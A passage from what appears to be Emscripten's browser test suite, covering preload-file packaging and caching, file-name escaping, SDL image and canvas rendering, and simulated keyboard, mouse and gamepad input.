("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
      # test: a missing file should run xhr.onload with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main]', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', 'EXPORTED_FUNCTIONS=[_main]'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
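# Note: unlike the keydown/keyup helpers in the other tests, simulateKeyEvent
# here dispatches a 'keypress' on document.body rather than document;
# sdl_text.c is expected to pick these up via SDL's text input handling.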
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
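# The helper above offsets every coordinate by the canvas position
# (Module['canvas'].offsetLeft/offsetTop), so the native side effectively
# works in canvas-relative coordinates. test_sdl_mouse_offsets below does the
# opposite: it passes page coordinates unmodified and moves the canvas inside
# a positioned container, to check that the offsets get subtracted at runtime.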
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear the textarea (its contents can persist across reloads)
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
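# The canvas sits inside a container offset 5px from the page origin, so the
# mouse events (sent in page coordinates by pre.js) only map to the right
# canvas positions if the runtime accounts for the canvas offsets itself.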
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
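# Per the 2012 Working Draft, buttons are plain numbers (0/1). The Editor's
# Draft variant in test_sdl_joystick_2 below instead models each button as a
# { pressed, value } object.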
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch a 'gamepadconnected' event (required for the glfw joystick test; the SDL tests do not use it)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('test_glfw_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
